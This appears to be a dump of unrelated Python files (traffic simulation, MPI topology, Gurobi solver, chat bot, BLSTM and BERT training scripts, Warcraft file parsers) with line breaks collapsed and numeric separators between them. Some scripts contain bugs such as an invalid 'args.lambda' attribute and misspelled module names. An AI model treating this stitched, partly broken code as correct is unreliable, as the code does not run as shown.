elif (daytime >= 840 and daytime < 1080): sleeptime = 3 elif (daytime >= 1080 and daytime < 1260): sleeptime = 1 elif (daytime >= 1260): sleeptime = 4 Vehicle(lane_number, vehicleTypes[vehicle_type], direction_number, directionNumbers[direction_number]) time.sleep(sleeptime) daytime += sleeptime def turnp(probability): rnumber = random.uniform(0, 1) if rnumber > probability: return False else: return True class Main: thread1 = threading.Thread(name="initialization",target=initialize, args=()) # initialization thread1.daemon = True thread1.start() # Colours black = (0, 0, 0) white = (255, 255, 255) # Screensize screenWidth = 1400 screenHeight = 800 screenSize = (screenWidth, screenHeight) # Setting background image i.e. image of intersection background = pygame.image.load('images/intersection.png') screen = pygame.display.set_mode(screenSize) pygame.display.set_caption("SIMULATION") # Loading signal images and font redSignal = pygame.image.load('images/signals/red.png') yellowSignal = pygame.image.load('images/signals/yellow.png') greenSignal = pygame.image.load('images/signals/green.png') font = pygame.font.Font(None, 30) thread2 = threading.Thread(name="generateVehicles",target=generateVehicles, args=()) # Generating vehicles thread2.daemon = True thread2.start() while True: for event in pygame.event.get(): if event.type == pygame.QUIT: sys.exit() screen.blit(background,(0,0)) # display background in simulation for i in range(0,noOfSignals): # display signal and set timer according to current status: green, yello, or red if(i==currentGreen): if(currentYellow==1): signals[i].signalText = signals[i].yellow screen.blit(yellowSignal, signalCoods[i]) else: signals[i].signalText = signals[i].green screen.blit(greenSignal, signalCoods[i]) else: if(signals[i].red<=10): signals[i].signalText = signals[i].red else: signals[i].signalText = "---" screen.blit(redSignal, signalCoods[i]) signalTexts = ["","","",""] # display signal timer for i in range(0,noOfSignals): signalTexts[i] = font.render(str(signals[i].signalText), True, white, black) screen.blit(signalTexts[i],signalTimerCoods[i]) # display the vehicles for vehicle in simulation: screen.blit(vehicle.image, [vehicle.x, vehicle.y]) vehicle.move() pygame.display.update() Main()
12,795
4,117
# Authors: # Loic Gouarin <loic.gouarin@polytechnique.edu> # Benjamin Graille <benjamin.graille@math.u-psud.fr> # # License: BSD 3 clause """ Module which implements a Cartesian MPI topology """ import numpy as np import mpi4py.MPI as mpi from .options import options class MpiTopology: """ Interface construction using a MPI topology. Parameters ---------- dim : int number of spatial dimensions (1, 2, or 3) comm : comm the default MPI communicator period : list boolean list that specifies if a direction is periodic or not. Its size is dim. Attributes ---------- dim : int number of spatial dimensions (1, 2, or 3) comm : comm the communicator of the topology split : tuple number of processes in each direction neighbors : list list of the neighbors where we have to send and to receive messages sendType : list list of subarrays that defines the part of data to be send sendTag : list list of tags for the send messages recvType : list list of subarrays that defines the part of data to update during a receive message recvTag : list list of tags for the receive messages Methods ------- set_options : defines command line options. get_coords : return the coords of the process in the MPI topology. set_subarray : create subarray for the send and receive message update : update a numpy array according to the subarrays and the topology. """ def __init__(self, dim, period, comm=mpi.COMM_WORLD): self.dim = dim self.set_options() self.comm = comm # if npx, npy and npz are all set to the default value (1) # then Compute_dims performs the splitting of the domain if self.npx == self.npy == self.npz == 1: size = comm.Get_size() split = mpi.Compute_dims(size, self.dim) else: split = (self.npx, self.npy, self.npz) self.split = np.asarray(split[:self.dim]) self.cartcomm = comm.Create_cart(self.split, period) def get_region_indices_(self, n, axis=0): """ 1D region indices owned by each sub domain. Parameters ---------- n : int number of total discrete points for a given axis axis : int axis used in the MPI topology Returns ------- list list of regions owned by each processes for a given axis """ region_indices = [0] nproc = self.cartcomm.Get_topo()[0][axis] for i in range(nproc): region_indices.append(region_indices[-1] + n//nproc + ((n % nproc) > i)) return region_indices def get_region_indices(self, nx, ny=None, nz=None): """ Region indices owned by each sub domain. Parameters ---------- nx : int number of total discrete points in x direction ny : int number of total discrete points in y direction default is None nz : int number of total discrete points in z direction default is None Returns ------- list list of regions owned by each processes """ region_indices = [self.get_region_indices_(nx, 0)] if ny is not None: region_indices.append(self.get_region_indices_(ny, 1)) if nz is not None: region_indices.append(self.get_region_indices_(nz, 2)) return region_indices def get_coords(self): """ return the coords of the process in the MPI topology as a numpy array. """ rank = self.cartcomm.Get_rank() return np.asarray(self.cartcomm.Get_coords(rank)) def get_region(self, nx, ny=None, nz=None): """ Region indices owned by the sub domain. Parameters ---------- nx : int number of total discrete points in x direction ny : int number of total discrete points in y direction default is None nz : int number of total discrete points in z direction default is None Returns ------- list region owned by the process """ region_indices = self.get_region_indices(nx, ny, nz) coords = self.get_coords() region = [] for i in range(coords.size): region.append([region_indices[i][coords[i]], region_indices[i][coords[i] + 1] ]) return region def set_options(self): """ defines command line options. """ self.npx = int(options().npx) self.npy = int(options().npy) self.npz = int(options().npz) def get_directions(dim): """ Return an array with all the directions around. Parameters ---------- dim : int number of spatial dimensions (1, 2, or 3) Returns ------- ndarray all the possible directions with a stencil of 1 Examples -------- >>> get_directions(1) array([[-1], [ 0], [ 1]]) >>> get_directions(2) array([[-1, -1], [-1, 0], [-1, 1], [ 0, -1], [ 0, 0], [ 0, 1], [ 1, -1], [ 1, 0], [ 1, 1]], dtype=int32) """ common_direction = np.array([-1, 0, 1]) if dim == 1: directions = common_direction[:, np.newaxis] elif dim == 2: common_direction = common_direction[np.newaxis, :] directions = np.empty((9, 2), dtype=np.int32) directions[:, 0] = np.repeat(common_direction, 3, axis=1).flatten() directions[:, 1] = np.repeat(common_direction, 3, axis=0).flatten() elif dim == 3: common_direction = common_direction[np.newaxis, :] directions = np.empty((27, 3), dtype=np.int32) directions[:, 0] = np.repeat(common_direction, 9, axis=1).flatten() directions[:, 1] = np.repeat(np.repeat(common_direction, 3, axis=0), 3).flatten() directions[:, 2] = np.repeat(common_direction, 9, axis=0).flatten() return directions
6,327
1,910
from gurobipy import * import math import numpy as np import heapq def heap_sort(items): heapq.heapify(items) items[:] = [heapq.heappop(items) for i in range(len(items))] return items def createGraph(input_file, instance_format): global n, m , k, matrix, ordered_sizes if instance_format == 'orlib': f = open(input_file, "r") matrix = [] for i in range(0,n): list = [] for j in range(0,n): list.append(float("inf")) matrix.append(list) m = sum(1 for line in open(input_file)) #with open(input_file, "r") as f: for i in range(0, m): string = f.readline() string = string.split() if string is not "EOF": v1 = int(string[0]) - 1 v2 = int(string[1]) - 1 weight = int(string[2]) matrix[v1][v2] = weight matrix[v2][v1] = weight f.close() for i in range(0, n): matrix[i][i] = 0 for i in range(0, n): #print(i) for j in range(0, n): for l in range(0, n): if matrix[i][j] == float("inf") or matrix[i][l] == float("inf"): cost = float("inf") else: cost = matrix[i][j] + matrix[i][l] if cost < matrix[j][l]: matrix[j][l] = cost ordered_sizes = [] for i in range(0, n): for j in range(i, n): ordered_sizes.append(matrix[i][j]) ordered_sizes = heap_sort(ordered_sizes) elif instance_format == 'tsplib': f = open(input_file, "r") m = n matrix = [] for i in range(0,n): list = [] for j in range(0,n): list.append(float("inf")) matrix.append(list) positions = [] for i in range(0, m): string = f.readline() string = string.split() temp_position = [] temp_position.append(int(string[0])-1) temp_position.append(float(string[1])) temp_position.append(float(string[2])) positions.append(temp_position) for i in range(0, n): for j in range(0, n): dist_temp = math.sqrt(((positions[i][1] - positions[j][1]) * (positions[i][1] - positions[j][1])) + ((positions[i][2] - positions[j][2]) * (positions[i][2] - positions[j][2]))) matrix[i][j] = dist_temp matrix[j][i] = dist_temp f.close() for i in range(0, n): matrix[i][i] = 0 ordered_sizes = [] for i in range(0, n): for j in range(i, n): ordered_sizes.append(matrix[i][j]) ordered_sizes = heap_sort(ordered_sizes) def run(r): global total_runtime, k, runtime, num_centers, m, cap, input_file prunedMatrix = [] for i in range(0,n): list = [] for j in range(0,n): list.append(float(0)) prunedMatrix.append(list) for i in range(0,n): for j in range(0,n): if matrix[i][j] <= r: prunedMatrix[i][j] = 1 try: global m, num_centers, runtime, cap m = Model("mip1") #****************************************************************************************************** m.setParam("MIPGap", 0.0); #****************************************************************************************************** y = [] for i in range(n): y.append(0) for i in range(n): y[i] = m.addVar(vtype=GRB.BINARY, name="y%s" % str(i+1)) m.setObjective(sum(y), GRB.MINIMIZE) temp_list = np.array(prunedMatrix).T.tolist() for i in range(n): m.addConstr(sum(np.multiply(temp_list[i], y).tolist()) >= 1) x = [] for i in range(n): temp = [] for j in range(n): temp.append(0) x.append(temp) for i in range(n): for j in range(n): x[i][j] = m.addVar(vtype=GRB.BINARY, name="x%s%s" % (str(i+1), str(j+1))) temp_list_2 = np.array(x).T.tolist() for i in range(n): m.addConstr(sum(temp_list_2[i]) * y[i] <= L) for i in range(n): for j in range(n): #m.addConstr(x[i][j] <= y[j] * prunedMatrix[i][j]) #****************************************************************************************************** m.addConstr(x[i][j] <= y[j] * prunedMatrix[i][j] * (1-y[i])) #****************************************************************************************************** for i in range(n): #m.addConstr(sum(x[i]) == 1) #****************************************************************************************************** m.addConstr(sum(x[i]) == 1 * (1-y[i])) #****************************************************************************************************** m.optimize() runtime = m.Runtime print("The run time is %f" % runtime) print("Obj:", m.objVal) #****************************************************************************************************** dom_set_size = 0 solution = [] assignment = [] center = 0 vertex_j = 1 vertex_i = 1 for v in m.getVars(): varName = v.varName if varName[0] == 'y': if v.x == 1.0: dom_set_size = dom_set_size + 1 solution.append(varName[1:]) else: if vertex_j <= n: if v.x == 1.0: assignment.append([vertex_i, vertex_j]) else: vertex_i = vertex_i + 1 vertex_j = 1 vertex_j = vertex_j + 1 print("Cap. dom. set cardinality: " + str(dom_set_size)) solution = [int(i) for i in solution] #print("solution: " + str(solution)) #print("assignment: " + str(assignment)) print('{"instance": "%s",' % input_file) print('"centers": [') counter = 0 for center in solution: counter = counter + 1 nodes = [] for node in assignment: if node[1] == center: nodes.append(node[0]) if counter == len(solution): print('{ "center": ' + str(center) + ', "nodes": ' + str(nodes) + '}') else: print('{ "center": ' + str(center) + ', "nodes": ' + str(nodes) + '},') print(']}') #print('%s %g' % (v.varName, v.x)) #****************************************************************************************************** # {"instance": "/home/ckc/Escritorio/pr124.tsp", # "outliers": [83,40,115,114], # "centers": [ { "center": 59, "nodes": [28,32,33,34,35,54,57,58,59,60,61,64,65]}, # { "center": 102, "nodes": [101,102,103,104,105,106,107,108,109,110,111,112,113]}, # { "center": 8, "nodes": [8,9,10,11,12,13,14,15,16,46,47,48,49]}, # { "center": 79, "nodes": [77,78,79,91,92,93,94,95,96,97,98,99,123]}, # { "center": 6, "nodes": [0,1,2,3,4,5,6,7,26,27,29,30,31]}, # { "center": 36, "nodes": [19,20,21,22,23,24,25,36,37,38,39,55,56]}, # { "center": 16, "nodes": [17,18,40,41,42,43,44,45,50,51,52,53]}, # { "center": 96, "nodes": [72,73,74,75,76,80,116,117,118,119,120,121,122]}, # { "center": 89, "nodes": [84,85,86,87,88,89,90,100]}, # { "center": 64, "nodes": [62,63,66,67,68,69,70,71,81,82,83,114,115]} # ]} num_centers = dom_set_size # num_centers = m.objVal except GurobiError: print("Error reported") def binarySearch(): global total_runtime, k, runtime, num_centers, input_file total_runtime = 0 not_done = True upper = len(ordered_sizes) - 1 lower = 0 best_solution_size = float("inf") while not_done: #mid = math.ceil(lower + ((upper - lower)/2)) mid = math.ceil((upper + lower) /2) mid_value = ordered_sizes[int(mid)] if mid == upper: not_done = False run(mid_value) total_runtime = total_runtime + runtime else: run(mid_value) total_runtime = total_runtime + runtime if num_centers <= k: upper = mid print("UPPER = MID") if mid_value <= best_solution_size: best_solution_size = mid_value else: lower = mid print("LOWER = MID") print("best solution size: " + str(best_solution_size)) print("total runtime: " + str(total_runtime)) if __name__ == "__main__": global total_runtime, k, runtime, num_centers, L, n if len(sys.argv) != 6: print ("Wrong number of arguments") print ("exact input_file_path n k L instance_format") sys.exit() input_file = sys.argv[1] n = int(sys.argv[2]) k = int(sys.argv[3]) L = int(sys.argv[4]) instance_format = sys.argv[5] createGraph(input_file, instance_format) binarySearch()
10,060
3,487
# Mod00.py print('name: {}'.format(__name__)) import Calc00 import Calc00 as c from Calc00 import * x= 20; y= 10; Calc00.Sum(x, y) c.Sub(x,y) Mul(x,y) import sys for path in sys.path: print(path)
204
105
from collections import namedtuple from fbchat import Client from fbchat.models import ThreadType class Bot(Client): Command = namedtuple('Command', ['func', 'admin', 'directed']) def __init__(self, email, password, name, admins=[], protected=[], *args, **kwargs): super(Bot, self).__init__(email=email, password=password, *args, **kwargs) self.name = name self.protected = protected + admins self.admins = admins self.commands = {} self.add_message_handler("help", self.commands_cmd) def commands_cmd(self, msg): """Print this message.""" def get_commands(): return self.commands.iteritems() commands_msg = "You can say:\n" for kword, cmd in sorted(get_commands(), key=lambda x: x[1].admin): admin_msg = " (admin only)" if cmd.admin else "" commands_msg += "{}:{} {}\n".format(kword, admin_msg, cmd.func.__doc__) self.sendMessage(commands_msg, msg['thread_id'], msg['thread_type']) def add_message_handler(self, kword, func, admin=False, directed=True): self.commands[kword] = Bot.Command(func, admin, directed) def onMessage(self, **kwargs): super(Bot, self).onMessage(**kwargs) if kwargs['author_id'] == self.uid: return is_admin = kwargs['author_id'] in self.admins is_directed = kwargs['message'].startswith("@" + self.name) is_dm = kwargs['thread_type'] == ThreadType.USER if is_directed: kwargs['message'] = kwargs['message'].split("@" + self.name)[1].strip() kword = kwargs['message'].split(' ', 1)[0].lower() cmd = self.commands.get(kword) if (cmd and (not cmd.admin or is_admin) and (not cmd.directed or is_directed or is_dm)): cmd.func(kwargs)
1,887
568
import debian class WindowsWSL(debian.DebianBox): model = ('windows_wsl')
80
30
from functools import lru_cache from transformers import pipeline @lru_cache def load_zeroshot_model(model_name="valhalla/distilbart-mnli-12-6"): classifier = pipeline("zero-shot-classification", model=model_name) return classifier
242
82
table={i:j for i,j in enumerate("abcdefghijklmnopqrstuvwxyz"+"abcdefghijklmnopqrstuvwxyz".upper())} def decode(cipher, b, c): cipher.insert(0, 0) res=[] for i in range(1, len(cipher)): res.append(table[cipher[i]-cipher[i-1]-b-c]) return "".join(res)
273
122
from .habappschedulerview import HABAppSchedulerView
53
16
# Generated by Django 3.0.3 on 2020-05-06 22:02 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('cases', '0001_initial'), ] operations = [ migrations.AddField( model_name='visual', name='id', field=models.AutoField(auto_created=True, default=4, primary_key=True, serialize=False, verbose_name='ID'), preserve_default=False, ), migrations.AlterField( model_name='visual', name='country', field=models.CharField(max_length=255), ), ]
627
196
#!/usr/bin/env python #encoding=utf-8 ''' @Time : 2020/10/25 22:28:30 @Author : zhiyang.zzy @Contact : zhiyangchou@gmail.com @Desc : 训练相似度模型 1. siamese network,分别使用 cosine、曼哈顿距离 2. triplet loss ''' # here put the import lib from model.bert_classifier import BertClassifier import os import time from numpy.lib.arraypad import pad import nni from tensorflow.python.ops.gen_io_ops import write_file import yaml import logging import argparse logging.basicConfig(level=logging.INFO) import data_input from config import Config from model.siamese_network import SiamenseRNN, SiamenseBert from data_input import Vocabulary, get_test from util import write_file def train_siamese(): # 读取配置 # conf = Config() cfg_path = "./configs/config.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # 读取数据 data_train, data_val, data_test = data_input.get_lcqmc() # data_train = data_train[:100] print("train size:{},val size:{}, test size:{}".format( len(data_train), len(data_val), len(data_test))) model = SiamenseRNN(cfg) model.fit(data_train, data_val, data_test) pass def predict_siamese(file_='./results/'): # 加载配置 cfg_path = "./configs/config.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') test_arr, query_arr = get_test(file_, vocab) # 加载模型 model = SiamenseRNN(cfg) model.restore_session(cfg["checkpoint_dir"]) test_label, test_prob = model.predict(test_arr) out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)] write_file(out_arr, file_ + '.siamese.predict', ) pass def train_siamese_bert(): # 读取配置 # conf = Config() cfg_path = "./configs/config_bert.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # 自动调参的参数,每次会更新一组搜索空间中的参数 tuner_params= nni.get_next_parameter() cfg.update(tuner_params) # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 data_train, data_val, data_test = data_input.get_lcqmc_bert(vocab) # data_train = data_train[:100] print("train size:{},val size:{}, test size:{}".format( len(data_train), len(data_val), len(data_test))) model = SiamenseBert(cfg) model.fit(data_train, data_val, data_test) pass def predict_siamese_bert(file_="./results/input/test"): # 读取配置 # conf = Config() cfg_path = "./configs/config_bert.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) os.environ["CUDA_VISIBLE_DEVICES"] = "4" # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 test_arr, query_arr = data_input.get_test_bert(file_, vocab) print("test size:{}".format(len(test_arr))) model = SiamenseBert(cfg) model.restore_session(cfg["checkpoint_dir"]) test_label, test_prob = model.predict(test_arr) out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)] write_file(out_arr, file_ + '.siamese.bert.predict', ) pass def train_bert(): # 读取配置 # conf = Config() cfg_path = "./configs/bert_classify.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # 自动调参的参数,每次会更新一组搜索空间中的参数 tuner_params= nni.get_next_parameter() cfg.update(tuner_params) # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 data_train, data_val, data_test = data_input.get_lcqmc_bert(vocab, is_merge=1) # data_train = data_train[:100] print("train size:{},val size:{}, test size:{}".format( len(data_train), len(data_val), len(data_test))) model = BertClassifier(cfg) model.fit(data_train, data_val, data_test) pass def predict_bert(file_="./results/input/test"): # 读取配置 # conf = Config() cfg_path = "./configs/bert_classify.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 test_arr, query_arr = data_input.get_test_bert(file_, vocab, is_merge=1) print("test size:{}".format(len(test_arr))) model = BertClassifier(cfg) model.restore_session(cfg["checkpoint_dir"]) test_label, test_prob = model.predict(test_arr) out_arr = [x + [test_label[i]] + [test_prob[i]] for i, x in enumerate(query_arr)] write_file(out_arr, file_ + '.bert.predict', ) pass def siamese_bert_sentence_embedding(file_="./results/input/test.single"): # 输入一行是一个query,输出是此query对应的向量 # 读取配置 cfg_path = "./configs/config_bert.yml" cfg = yaml.load(open(cfg_path, encoding='utf-8'), Loader=yaml.FullLoader) cfg['batch_size'] = 64 os.environ["CUDA_VISIBLE_DEVICES"] = "7" # vocab: 将 seq转为id, vocab = Vocabulary(meta_file='./data/vocab.txt', max_len=cfg['max_seq_len'], allow_unk=1, unk='[UNK]', pad='[PAD]') # 读取数据 test_arr, query_arr = data_input.get_test_bert_single(file_, vocab) print("test size:{}".format(len(test_arr))) model = SiamenseBert(cfg) model.restore_session(cfg["checkpoint_dir"]) test_label = model.predict_embedding(test_arr) test_label = [",".join([str(y) for y in x]) for x in test_label] out_arr = [[x, test_label[i]] for i, x in enumerate(query_arr)] print("write to file...") write_file(out_arr, file_ + '.siamese.bert.embedding', ) pass if __name__ == "__main__": os.environ["CUDA_VISIBLE_DEVICES"] = "4" ap = argparse.ArgumentParser() ap.add_argument("--method", default="bert", type=str, help="train/predict") ap.add_argument("--mode", default="train", type=str, help="train/predict") ap.add_argument("--file", default="./results/input/test", type=str, help="train/predict") args = ap.parse_args() if args.mode == 'train' and args.method == 'rnn': train_siamese() elif args.mode == 'predict' and args.method == 'rnn': predict_siamese(args.file) elif args.mode == 'train' and args.method == 'bert_siamese': train_siamese_bert() elif args.mode == 'predict' and args.method == 'bert_siamese': predict_siamese_bert(args.file) elif args.mode == 'train' and args.method == 'bert': train_bert() elif args.mode == 'predict' and args.method == 'bert': predict_bert(args.file) elif args.mode == 'predict' and args.method == 'bert_siamese_embedding': # 此处输出句子的 embedding,如果想要使用向量召回 # 建议训练模型的时候,损失函数使用功能和faiss一致的距离度量,例如faiss中使用是l2,那么损失函数用l2 # faiss距离用cos,损失函数用cosin,或者损失中有一项是cosin相似度损失 siamese_bert_sentence_embedding(args.file)
7,048
2,947
import os import random import argparse import torch import torch.nn as nn import numpy as np from torch.utils.data import DataLoader from tqdm import tqdm from model import * from Loss import * from data_load import * from model_evaluation import * #python train_blstm_e2e.py --savedir "/home/hexin/Desktop/models" --train "/home/hexin/Desktop/data/train.txt" --test "/home/hexin/Desktop/data/test.txt" # --seed 0 --device 0 --batch 8 --epochs 60 --dim 23 --lang 3 --model my_sa_e2e --lr 0.00001 --lambda 0.5 def setup_seed(seed): torch.manual_seed(seed) torch.cuda.manual_seed_all(seed) np.random.seed(seed) torch.backends.cudnn.deterministic = True torch.backends.cudnn.benchmark = False def get_lr(optimizer): for param_group in optimizer.param_groups: return param_group['lr'] def get_output(outputs, seq_len): output_ = 0 for i in range(len(seq_len)): length = seq_len[i] output = outputs[i, :length, :] if i == 0: output_ = output else: output_ = torch.cat((output_, output), dim=0) return output_ def main(): parser = argparse.ArgumentParser(description='paras for making data') parser.add_argument('--model', type=str, help='model name', default='my_BLSTM') parser.add_argument('--savedir', type=str, help='dir in which the trained model is saved') parser.add_argument('--train', type=str, help='training data, in .txt') parser.add_argument('--test', type=str, help='testing data, in .txt') parser.add_argument('--seed', type=int, help='Device name', default=0) parser.add_argument('--batch', type=int, help='batch size', default=8) parser.add_argument('--device', type=int, help='Device name', default=0) parser.add_argument('--epochs', type=int, help='num of epochs', default=120) parser.add_argument('--dim', type=int, help='dim of input features', default=437) parser.add_argument('--lang', type=int, help='num of language classes', default=3) parser.add_argument('--lr', type=float, help='initial learning rate', default=0.0001) parser.add_argument('--lambda', type=float, help='hyperparameter for joint training', default=0.5) args = parser.parse_args() setup_seed(args.seed) device = torch.device('cuda:{}'.format(args.device) if torch.cuda.is_available() else 'cpu') # load model model = BLSTM_E2E_LID(n_lang=args.lang, dropout=0.25, input_dim=args.dim, hidden_size=256, num_emb_layer=2, num_lstm_layer=3, emb_dim=256) model.to(device) loss_func_DCL = DeepClusteringLoss().to(device) loss_func_CRE = nn.CrossEntropyLoss().to(device) # load data train_txt = args.train train_set = RawFeatures(train_txt) valid_txt = args.test valid_set = RawFeatures(valid_txt) train_data = DataLoader(dataset=train_set, batch_size=args.batch, pin_memory=True, num_workers=16, shuffle=True, collate_fn=collate_fn) valid_data = DataLoader(dataset=valid_set, batch_size=1, pin_memory=True, shuffle=False, collate_fn=collate_fn) # optimizer & learning rate decay strategy optimizer = torch.optim.Adam(model.parameters(), lr=args.lr) T_max = args.epochs scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=T_max) # Train the model total_step = len(train_data) best_acc = 0 for epoch in tqdm(range(args.epochs)): loss_item = 0 model.train() for step, (utt, labels, seq_len) in enumerate(train_data): utt_ = utt.to(device=device, dtype=torch.float) utt_ = rnn_utils.pack_padded_sequence(utt_, seq_len, batch_first=True) labels_ = rnn_util.pack_padded_sequence(labels, seq_len, batch_first=True).data.to(device) # Forward pass outputs, embeddings = model(utt_) loss_DCL = loss_func_DCL(embeddings, labels_) loss_CRE = loss_func_CRE(outputs, labels_) loss = args.lambda * loss_CRE + (1 - args.lambda) * loss_DCL # Backward and optimize optimizer.zero_grad() loss.backward() optimizer.step() if step % 200 == 0: print("Epoch [{}/{}], Step [{}/{}] Loss: {:.4f} CRE: {:.4f} DCL: {:.4f}" .format(epoch + 1, args.epochs, step + 1, total_step, loss.item(), loss_CRE.item(), loss_DCL.item())) scheduler.step() model.eval() correct = 0 total = 0 eer = 0 FAR_list = torch.zeros(args.lang) FRR_list = torch.zeros(args.lang) with torch.no_grad(): for step, (utt, labels, seq_len) in enumerate(valid_data): utt = utt.to(device=device, dtype=torch.float) utt_ = rnn_utils.pack_padded_sequence(utt, seq_len, batch_first=True) labels_ = rnn_util.pack_padded_sequence(labels, seq_len, batch_first=True).data.to(device) outputs, embeddings = model(utt_) predicted = torch.argmax(outputs,-1) total += labels.size(-1) correct += (predicted == labels_).sum().item() FAR, FRR = compute_far_frr(args.lang, predicted, labels_) FAR_list += FAR FRR_list += FRR acc = correct / total print('Current Acc.: {:.4f} %'.format(100 * acc)) for i in range(args.lang): eer_ = (FAR_list[i] / total + FRR_list[i] / total) / 2 eer += eer_ print("EER for label {}: {:.4f}%".format(i, eer_ * 100)) print('EER: {:.4f} %'.format(100 * eer / args.lang)) if acc > best_acc: print('New best Acc.: {:.4f}%, EER: {:.4f} %, model saved!'.format(100 * acc, 100 * eer / args.lang)) best_acc = acc best_eer = eer / args.lang torch.save(model.state_dict(), '/home/hexin/Desktop/models/' + '{}.ckpt'.format(args.model)) print('Final Acc: {:.4f}%, Final EER: {.4f}%'.format(100 * best_acc, 100 * best_eer)) if __name__ == "__main__": main()
6,517
2,151
from construct import * from .common import * """ Formats: w3u, w3t, w3b, w3h, w3d, w3a, w3q Version: 1 The objects file contains data that the object editor would typically manipulate. If dealing with abilities, doodads or upgrades, the ObjectsWithVariationsFile is used instead of the ObjectsFile. Optionally, the ObjectsBestFitFile can be used as well which tries to parse the file with both formats--one should always fail when used with the other, so it selects whichever didn't fail. Performance should be really bad on this. """ class ObjectModificationTerminatorValidator(Validator): def _validate(self, obj, ctx, path): return obj in [b"\x00\x00\x00\x00", ctx._.new_object_id, ctx._.original_object_id] ObjectModification = Struct( "modification_id" / ByteId, "value_type" / Enum(Integer, INT=0, REAL=1, UNREAL=2, STRING=3), "value" / Switch(this.value_type, { "INT" : Integer, "REAL" : Float, "UNREAL" : Float, "STRING" : String }), "parent_object_id" / ObjectModificationTerminatorValidator(ByteId) ) ObjectDefinition = Struct( "original_object_id" / ByteId, "new_object_id" / ByteId, "modifications_count" / Integer, "modifications" / Array(this.modifications_count, ObjectModification) ) ObjectTable = Struct( "objects_count" / Integer, "objects" / Array(this.objects_count, ObjectDefinition) ) ObjectsFile = Struct( "version" / Integer, "original_objects_table" / ObjectTable, "custom_objects_table" / ObjectTable ) ObjectModificationWithVariation = Struct( "modification_id" / ByteId, "value_type" / Enum(Integer, INT=0, REAL=1, UNREAL=2, STRING=3), "variation" / Integer, "ability_data_column" / Enum(Integer, A=0, B=1, C=2, D=3, F=4, G=5, H=6), "value" / Switch(this.value_type, { "INT" : Integer, "REAL" : Float, "UNREAL" : Float, "STRING" : String }), "parent_object_id" / ObjectModificationTerminatorValidator(ByteId) ) ObjectDefinitionWithVariations = Struct( "original_object_id" / ByteId, "new_object_id" / ByteId, "modifications_count" / Integer, "modifications" / Array(this.modifications_count, ObjectModificationWithVariation) ) ObjectTableWithVariations = Struct( "objects_count" / Integer, "objects" / Array(this.objects_count, ObjectDefinitionWithVariations) ) ObjectsWithVariationsFile = Struct( "version" / Integer, "original_objects_table" / ObjectTableWithVariations, "custom_objects_table" / ObjectTableWithVariations ) ObjectsBestFitFile = Select(ObjectsWithVariationsFile, ObjectsFile)
2,551
880
import pickle from collections import defaultdict from helper_functions import format_lemma, get_blends_csv from os import listdir import networkx as nx def saldo_obj(filename): saldo = defaultdict(int) with open(filename) as f: for line in f: if line.startswith('#'): continue line = line.split('\t') pos = line[-2].upper() lemma_id = line[0] lemma = line[0].split('..')[0].lower() mother = line[1] father = line[2] saldo[lemma] = (pos, father, mother, lemma_id) return saldo # def construct_network(saldo): # G = nx.DiGraph() # for k, (_, m, f, li) in saldo.items(): # if m not in G.nodes: # G.add_node(m) # if f not in G.nodes: # G.add_node(m) # if li not in G.nodes: # G.add_node(li) # if k not in G.nodes: # G.add('_' + k) # if G.has_edge(li, k): # G[k][li]['weight'] += 1 # else: # G.add_edge(k, li, weight=1) # if G.jas def get_candidates(): lexicon = 'saldo' corpus = 'news' candidate_folder = f'/home/adam/Documents/lexical_blends_project/{lexicon}_blends_candidates_noverlap_1/' c_set = set() for i, filename in enumerate(listdir(candidate_folder)): blend = filename.split('_')[0] print('### reading blend:', i, blend) with open(candidate_folder+filename) as f: for ln in f: cw1, cw2 = ln.rstrip().split(',') c_set.add(cw1) c_set.add(cw2) return c_set def nst_obj(filename): nst = defaultdict(int) with open(filename, encoding='iso-8859-1') as f: for i, line in enumerate(f): if line.startswith('!') or line.startswith('-'): continue line = line.split(';') seg = line[0] pos = line[1] sampa = line[11] while '|' in pos: pos = pos.split('|')[0] nst[seg.lower()] = (pos, sampa) return nst if __name__ == '__main__': #with open('/home/adam/Documents/lexical_blends_project/data/nst_lex.pickle', '+wb') as f: # nst = nst_obj('/home/adam/data/NST_svensk_leksikon/swe030224NST.pron/swe030224NST.pron') # pickle.dump(nst, f) #with open('/home/adam/Documents/lexical_blends_project/data/saldo_lex.pickle', '+wb') as f: # saldo = saldo_obj('/home/adam/data/saldo_2.3/saldo20v03.txt') # pickle.dump(saldo, f) with open('/home/adam/Documents/lexical_blends_project/data/nst_lex.pickle', 'rb') as f: nst = pickle.load(f) with open('/home/adam/Documents/lexical_blends_project/data/saldo_lex.pickle', 'rb') as f: saldo = pickle.load(f) c_set = get_candidates() print(list(saldo.keys())[:100]) print(list(nst.keys())[:100]) n_set = set(nst.keys()) s_set = set(saldo.keys()) true = len(c_set.intersection(n_set))/len(c_set) print(true)
3,078
1,139
